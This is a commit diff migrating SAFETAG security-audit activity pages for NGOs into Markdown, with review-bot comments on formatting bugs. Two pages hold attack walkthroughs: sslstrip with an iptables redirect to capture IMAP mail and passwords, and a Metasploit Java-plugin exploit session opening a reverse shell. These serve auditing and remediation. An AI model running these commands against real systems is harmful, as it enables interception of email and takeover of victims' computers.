
Commit

Updated migrated content for contentascode/metalsmith-migrate-safetag#3
jmatsushita committed Sep 18, 2017
1 parent 8c6f92f commit 68f18dd
Showing 57 changed files with 217 additions and 25 deletions.
4 changes: 3 additions & 1 deletion content/toolkit/activities/assessment-plan.md
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@ id: assessment-plan
name: Assessment Plan
description: This component allows an auditor and host to come to an understanding of the level of access that an auditor will have,...
origin: https://github.com/SAFETAG/SAFETAG
origin_path: master/en/exercises/assessment_plan/summary.md
origin_path: master/en/exercises/assessment_plan/reporting.md
---
# Assessment Plan

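Review bot: `origin_path` now records `reporting.md` instead of `summary.md`, but the front matter above it (`name`, `description`) is still derived from the summary, so a single `origin_path` can only name one of the several source files merged into this page; consider recording the source directory (`master/en/exercises/assessment_plan/`) or a list of files. The `description` value is also cut mid-sentence with `...`; truncating at a sentence boundary would read better in listings.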
Expand Down Expand Up @@ -38,6 +38,8 @@ See the Appendix for a DRAFT combined engagement and confidentiality agreement.





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
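Review bot: this hunk grows the file by two lines (`-38,6 +38,8`) with no visible non-blank change, which suggests the migration appends blank lines before `<!-- Notes -->` on every run and is therefore not idempotent; collapse repeated blank lines in the generator. While here, the footnote text reads `for submission the funder` and is missing `to`, and a space after the colon in `[^external_funding_and_reporting]:` is the conventional footnote form.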
2 changes: 2 additions & 0 deletions content/toolkit/activities/automated-recon.md
Expand Up @@ -24,6 +24,8 @@ See the Appendix for a full walk-through of using recon-ng





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
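Review bot: the `[^external_funding_and_reporting]` footnote definition is about the assessment-plan stage, yet it appears in this file and in every other activity touched by this commit; unless the body actually references `[^external_funding_and_reporting]`, the migration is appending one shared notes block to every page rather than each activity's own notes.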
2 changes: 2 additions & 0 deletions content/toolkit/activities/capacity-assessment-cheatsheet.md
Expand Up @@ -65,6 +65,8 @@ Preparation Support





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/check-config-files.md
Expand Up @@ -17,6 +17,8 @@ Examine configuration files for vulnerabilities using "hardening", or "common m





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
20 changes: 15 additions & 5 deletions content/toolkit/activities/check-mail-server-vulns.md
Expand Up @@ -26,26 +26,36 @@ Even an informed staff member who attempts to configure his email client to requ

## Walkthrough

#### Walkthrough
If the attacker wishes to observe the victim’s email traffic (most likely because they failed to capture an unencrypted password, which would have allowed them to log in as the victim and read their email directly), they may need to carry out a second, slightly more complex attack, which will also likely provide access to the victims password as well as the content of their email.

To capture outgoing (SMTP) messages, the process is nearly identical to the traffic monitoring exercise.

!INCLUDE "../traffic_monitoring/instructions.md"
:[](../traffic_analysis/instructions.md)

In order to monitor incoming (POP3 or IMAP) messages, the attacker must use other techniques to ensure that responses to the victim actually pass through their machine before they arrive at their intended recipient. The most straightforward tool for this sort of thing is designed to attack Web traffic, but the same techniques works on POP3 and IMAP traffic. (This tool, SSLStrip, was written to facilitate more advanced testing of Web services that do implement encryption, but that do so incorrectly. In any case, it works fine for our purposes here.)

``$ sslstrip -a -l 12345 -w sslstrip.log
```
$ sslstrip -a -l 12345 -w sslstrip.log
```

The attacker then uses iptables to route a portion of the victim’s traffic (in this case, IMAP traffic destined for port 143) through the SSLStrip tool, which rewrites headers such that responses come to them first, before continuing along to the victim. The attacker then monitors the tool’s output for email messages:

``$ iptables -t nat -A PREROUTING -p tcp --destination-port 143 –j REDIRECT --to-port 12345
``$ tail -f sslstrip.log
```
$ iptables -t nat -A PREROUTING -p tcp --destination-port 143 –j REDIRECT --to-port 12345
$ tail -f sslstrip.log
```

(For POP3, the attacker would use port 110 instead of port 143, but the attack is otherwise identical.) At this point, the contents of the sslstrip.log file contains a copy of incoming IMAP traffic, including any email messages the victim might read while being observed.

This same technique, with minor modifications, would work to monitor incoming email messages downloaded through Webmail

## Recommendation

Mandatory (SSL, TLS or HTTPS) encryption on all authenticated services (especially email). This should apply to both direct connections to the email server (e.g. via IMAP, MAPI, SMTP) as well as webmail services.

Those who use Outlook, or some other email client, should only be allowed to connect to the organization’s mail server using SSL or TLS encryption. Attempts to connected without encryption should fail. All staff mail clients should be reconfigured accordingly.




<!-- Notes -->
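Review bot: `#### Walkthrough` directly under `## Walkthrough` duplicates the heading at a different level and should be dropped. The transclusion `:[](../traffic_analysis/instructions.md)` replaces the old `!INCLUDE "../traffic_monitoring/instructions.md"` with a different directory name, and the relative path still assumes the SAFETAG `exercises/` layout rather than `content/toolkit/activities/`, so check that it resolves after migration. In the Recommendation, `Attempts to connected without encryption should fail` should read `Attempts to connect`, and the sentence ending `downloaded through Webmail` lacks its full stop.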
76 changes: 76 additions & 0 deletions content/toolkit/activities/check-user-browser-vulns.md
Expand Up @@ -13,4 +13,80 @@ origin_path: master/en/exercises/check_user_browser_vulns/browser_java_plugin.md



## summary

Outdated Java browser plugins

One or more of the organization’s laptops were seen to be running an outdated, known-vulnerable version of the Java plugin for Internet Explorer.


## description

This version contains a vulnerability that is easily exploitable using one of the recent Java exploit modules from the widely available Metasploit security auditing framework. These modules allow an attacker to gain complete control over the computer of a victim who visits a malicious Web site hosted anywhere on the Internet. If the attacker is inside the office LAN, they can easily trick the victim into visiting that malicious Web site without the victim even knowing it.

## recommendation

At least one of the organization’s computers is running an outdated Java browser plugin, and exploit code is widely-available for several critical vulnerabilities in versions older than “Java 7, update 16.” All of the organization’s Java installations should be updated to the latest version. This can be troublesome, as (unlike the Windows operating system itself) Java plugins sometimes require user input before they will install updates.


## exploit

While the threat described below is more severe if carried out by a local attacker (as they can more readily direct the victim to a malicious Web site), it also works remotely. In fact, if a user can be tricked, by a remote attacker, into clicking on a malicious email or Web link, attacks like this represent a significant perimeter threat. By compromising the victim’s machine, they can give the attacker a local point-of-presence without requiring the attacker to crack WPA keys or gain local access in some other way.

Step 1: Using Metasploit, an attacker can easily create an ad hoc malicious Web site:

```
$ msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1114 exploits - 627 auxiliary - 178 post
+ -- --=[ 307 payloads - 30 encoders - 8 nops
msf > use exploit/multi/browser/java_jre17_exec
msf exploit(java_jre17_exec) > set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp
msf exploit(java_jre17_exec) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf exploit(java_jre17_exec) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(java_jre17_exec) > set URIPATH java_test
URIPATH => java_test
msf exploit(java_jre17_exec) > run
[*] Exploit running as background job.
```

Step 2: At this point, any local user who visits http://192.168.1.123:8081/java_test, and who is running a sufficiently out-of-date version of the Java browser plugin, stands a good chance of giving the attacker full access to his computer:

```
[*] Started reverse handler on 192.168.1.123:4444
msf exploit(java_jre17_exec) >
[*] Using URL: http://0.0.0.0:8081/java_test
[*] Local IP: http://192.168.1.123:8081/java_test
[*] Server started.
msf exploit(java_jre17_exec) >
<remote shell>
```

Figure 1: Attacker in control of the victim’s computer through a remote command shell



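Review bot: the section headings `## summary`, `## description`, `## recommendation` and `## exploit` look like the origin file names rather than titles; other migrated pages use `## Walkthrough` and `## Recommendation`, so title-case these for consistency, and `Outdated Java browser plugins` under `## summary` reads like the title that heading should carry. `Figure 1: Attacker in control of the victim's computer through a remote command shell` is a caption with no image in the hunk, so either the figure was dropped by the migration or the caption should be removed. The two fenced blocks are console transcripts without a language tag; tagging them keeps rendering consistent. Also `exploit code is widely-available` does not need the hyphen.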
2 changes: 2 additions & 0 deletions content/toolkit/activities/cms-version.md
Expand Up @@ -61,6 +61,8 @@ Some of these services will be revealed by BuiltWith, but checking the HTTP Resp
Guide for NGOs about DDoS: [Digital First Aid Kit](https://rarenet.github.io/DFAK/en/DDoSMitigation/)




<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
4 changes: 3 additions & 1 deletion content/toolkit/activities/confidentiality-agreement.md
Expand Up @@ -3,7 +3,7 @@ id: confidentiality-agreement
name: Confidentiality Agreement
description: Negotiate an agreement with the organization that outlines how an auditor will protect the privacy of the organization...
origin: https://github.com/SAFETAG/SAFETAG
origin_path: master/en/exercises/confidentiality_agreement/summary.md
origin_path: master/en/exercises/confidentiality_agreement/operational_security.md
---
# Confidentiality Agreement

Expand All @@ -20,6 +20,8 @@ See the Appendix for a DRAFT Engagement and Confidentiality Agreement. See also





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/data-lost-and-found.md
Expand Up @@ -20,6 +20,8 @@ See the Sensitive Data activity for an interactive way to gather the types of da





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/day-in-the-life.md
Expand Up @@ -53,6 +53,8 @@ As you work with staff members (this pairs well with the device checklist activi





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
4 changes: 3 additions & 1 deletion content/toolkit/activities/device-checklist.md
Expand Up @@ -3,7 +3,7 @@ id: device-checklist
name: Device and Software Version Assessment
description: The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and...
origin: https://github.com/SAFETAG/SAFETAG
origin_path: master/en/exercises/device_checklist/recommendations.md
origin_path: master/en/exercises/device_checklist/summary.md
---
# Device and Software Version Assessment

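Review bot: here `origin_path` moves from `recommendations.md` to `summary.md`, the opposite direction from `assessment-plan.md` in the same commit (`summary.md` to `reporting.md`), so which source file wins appears to depend on file-listing order; make the choice deterministic, or record all source files, so this field does not flip on each run.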
Expand Down Expand Up @@ -65,6 +65,8 @@ Most AV tools automatically update, but this can sometimes get out of sync, or i
##### Activate a personal firewall




<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
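Review bot: `##### Activate a personal firewall` is followed only by blank lines and the notes block, so either this recommendation's text was lost in migration or the heading should go; an H5 with no parent H3/H4 in view also suggests the heading levels from the source were not normalised.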
2 changes: 2 additions & 0 deletions content/toolkit/activities/dns-zone-transfer.md
Expand Up @@ -66,6 +66,8 @@ In most cases, the DNS Zone Transfer policies will be set by your domain name pr
If your organization maintains its own DNS servers, the administrator of those servers should check the zone transfer policies to prevent anonymous transfers.




<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/firewire.md
Expand Up @@ -80,6 +80,8 @@ Once again, it is worth noting that successful mitigation of this issue requires





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/follow-up-meeting.md
Expand Up @@ -33,6 +33,8 @@ At the end of the call, schedule a second follow-up call to check in on their pr





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/guided-tour.md
Expand Up @@ -58,6 +58,8 @@ _De-activate unused network ports_
Hard-wired network ports tend to connect directly into the most trusted parts of a network. De-activating any that are in public areas of the office (front desk, conference rooms, break rooms), as well as any that are not needed is recommended.




<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/identify-recommendations.md
Expand Up @@ -14,6 +14,8 @@ origin_path: master/en/exercises/identify_recommendations/index.md





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
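Review bot: the hunk begins immediately after the front matter (`origin_path: master/en/exercises/identify_recommendations/index.md`) and contains only blank lines and the notes footnote, which suggests this page has no body at all; verify that the content of `index.md` was actually migrated.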
2 changes: 2 additions & 0 deletions content/toolkit/activities/identify-useful-resources.md
Expand Up @@ -30,6 +30,8 @@ This can include, but is not limited to, local technical support and incident re





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/incident-response.md
Expand Up @@ -17,6 +17,8 @@ Establish a procedure for incident handling and an emergency contact in the even





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/insecure-website-login.md
Expand Up @@ -36,6 +36,8 @@ If an organization updates their website via FTP, it is worth noting that FTP is
When switching to SSL/Secure FTP after having used the plain versions, webmasters should also update all administrative passwords, and watch to make sure that no step along the way (hosting provider management/panel, file upload, CMS editing) goes over “clear” channels.




<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
4 changes: 3 additions & 1 deletion content/toolkit/activities/interviews.md
Expand Up @@ -3,7 +3,7 @@ id: interviews
name: Interviews
description: The auditor conducts interviews with various staff members to gather information on the organizations risks and...
origin: https://github.com/SAFETAG/SAFETAG
origin_path: master/en/exercises/interviews/summary.md
origin_path: master/en/exercises/interviews/operational_security.md
---
# Interviews

Expand All @@ -22,6 +22,8 @@ Q&A sessions are unabashedly _white box_ aspects of a security assessment, and y





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/long-term-follow-up.md
Expand Up @@ -27,6 +27,8 @@ This can be combined with the Staff Feedback Survey exercise, or to follow up on





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/mac-filtering.md
Expand Up @@ -43,6 +43,8 @@ ifconfig mon0 up
Transitioning to WPA networks with strong passwords, even for guest networks, is recommended.




<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/making-introductions.md
Expand Up @@ -26,6 +26,8 @@ Follow up with both the organization and the resources introduced to check in on





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/manual-recon.md
Expand Up @@ -53,6 +53,8 @@ Google dorking tricks:





<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
2 changes: 2 additions & 0 deletions content/toolkit/activities/monitor-open-wireless-traffic.md
Expand Up @@ -119,6 +119,8 @@ See [wikipedia]( https://en.wikipedia.org/wiki/Wi-Fi_positioning_system#Public_W
* Skyhook: http://www.skyhookwireless.com/opt-out-of-skyhook-products




<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
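Review bot: the context line `See [wikipedia]( https://en.wikipedia.org/wiki/Wi-Fi_positioning_system#Public_W...` has a leading space inside the link parentheses, which some Markdown renderers treat as literal text rather than a link; the migration could trim whitespace inside link targets.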
4 changes: 3 additions & 1 deletion content/toolkit/activities/mx-record-search.md
Expand Up @@ -3,7 +3,7 @@ id: mx-record-search
name: Mail Exchange Record Search
description: MX, or Mail Exchange, records are required to be public for any domain you wish to receive email through. These records...
origin: https://github.com/SAFETAG/SAFETAG
origin_path: master/en/exercises/mx-record-search/summary.md
origin_path: master/en/exercises/mx-record-search/recommendations.md
---
# Mail Exchange Record Search

Expand Down Expand Up @@ -45,6 +45,8 @@ No fix needed
Unless other assessments reveals specific vulnerabilities in e-mail services used, there is no action to take. Unless you have sufficient in-house expertise, it is often recommended to not host email servers. While self-hosted email provides more control and potentially security, managing the security of the server is a complex job. Other mail services, such as MailControl or Postini, also can provide some level of protection by being a first-pass check for spam and viruses, and (slightly) reducing the visibility of your organizational mail server.




<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.
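Review bot: `Unless other assessments reveals specific vulnerabilities` should read `reveal`, and the context heading `No fix needed` sits directly above a paragraph that does recommend actions (not self-hosting mail, using a filtering service), so the heading undersells the section.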
2 changes: 2 additions & 0 deletions content/toolkit/activities/network-scanning.md
Expand Up @@ -53,6 +53,8 @@ While office networks are often treated as "trusted" spaces, measures should be
A policy should be in place for connecting personal devices to work networks, as well as work devices to non-work networks.




<!-- Notes -->

[^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.